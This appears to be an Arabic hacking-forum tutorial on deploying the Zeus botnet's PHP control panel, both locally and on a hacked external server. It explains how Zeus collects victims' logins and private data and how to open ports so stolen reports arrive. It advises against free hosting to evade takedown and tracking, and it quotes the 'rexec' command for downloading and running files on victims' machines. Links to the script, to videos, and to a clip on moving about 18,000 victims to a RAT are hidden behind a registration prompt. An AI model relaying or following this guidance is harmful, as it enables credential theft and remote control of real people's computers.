+
----
-
<P style="FONT-FAMILY: Arial; FONT-SIZE: 16pt; FONT-WEIGHT: bold">السلام عليكم و رحمة الله و بركاته
كيفكم ابطال امان العرب الكرام
اليوم شرحنا بيتكلم عن تسطيب بوت نت zeus على الجهاز الشخصى و على سيرفر خارجى مخترق
ملحوظة : قد يسأل البعض لية ماسطبناش البوت نت على استضافة مجانية ؟
و الاجابة لانك لن تجد الفرصة فى التعامل مع الاسكريبت .. فسيتم مسح الاسكريبت بسرعة من على الاستضافة المجانية و تفقد الضحايا الى جمعتهم
و ايضا بتكون الاستضافة مراقبه فيمكن تتبعك او يكتفو بغلق حسابك ..
طيب الاول شرحنا تركيب السكريبت على الجهاز المحلى و شرحنا تثبيت الاباتشى عليه لويندوز xp و 7 فى الشرح السابق
البوت نت زيوس هو بوت نت مكون من جزئين ..
الاول هو سكريبت php و هو لوحة التحكم و تكون خاصة بك ياتيك التبليغات فيها
الثانى : و هو برنامج صغير يقوم بانتاج سيرفر الاختراق
طيب ما هى الوظيفة الاساسية للبوت نت زيوس ؟
الوظيفة الاساسية هى تجميع اى بيانات خاصة و اى log in للضحية على الانترنت سواء حسابات ايميلات او اى حسابات اخرى تخطر ببالك و تكون مع الضحية و يستخدمها فستصل لك
ملحوظة : لابد من فتح بورت بالمودم و هو 80 لكى تصلك الضحايا و تبليغات اللوج ان للضحايا ..
طيب لابد من التأكد ان الخدمة على بورت 80 تعمل بنجاح و لاختبارها قم بارسال النو اى بى الخاص بك لاى شخص تعرفه خارج الشبكة الخاصه بك
و يقوم بفتح النو اى بى فى المتصفح و اذا فتحت صفحة الاباتشى اذن الخدمة تعمل بنجاح
اما اذا فتح لك الجدار النارى الخاص بالمودم و طلب منك يوزر و باسورد للمودم اذن تاكد من البورت لان هناك خطأ فى الاعدادات ..
طيب ممكن بدل فتح البورت مخصص فى المودم .. تقوم بتفعيل خاصية ال DMZ فى المودم و تضع فيها الاى بى الداخلى لك
لكن كن على علم ان فى الحالة دى كل بورتاتك تكون مكشوفة للانترنت و قد يصيدك احد الهاكرز لو جهازك مصاب بريموت اكسبلويت مثل ثغرات الـ MS للويندوز ..
ملحوظة : اذا استخدمت برنامج الـ AppServ فى جهازك المحلى فتضع باسورد القاعدة عادى الى انت سويتها اثناء التثبيت لبرنامج الاباتشى
اما اذا استخدمت برنامج wamp فيكون افتراضى بدون باسورد للقاعدة فتترك خانة باسورد القاعدة فراغة
اوامر البوت نت تجدها فى المسار هنا
كود PHP:
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] و الامر الهام هو :
كود PHP:
rexec [url] [args]Download and execute the file [url] with the arguments [args] (optional).
و هو لتحميل ملف من الانترنت فى جهاز الضحية
نأتى الان لشرح تثبيت البوت نت زيوس على الجهاز المحلى
حمل الفيديو مرفوع من هنا
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]و شرح تثبيت البوت نت زيوس على سيرفر مخترق
حمل الفيديو مرفوع من هنا
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]لتحميل السكريبت للبوت نت زيوس من هنا
كود PHP:
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] و هنا مقطع وجدته فى جهازى مستخبى قلت اعرضة
و هو بيتكلم عن تحويل 18 الف ضحية تقريبا من البوت نت الى برنامج cerberus rat
شاهد المقطع من هنا
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]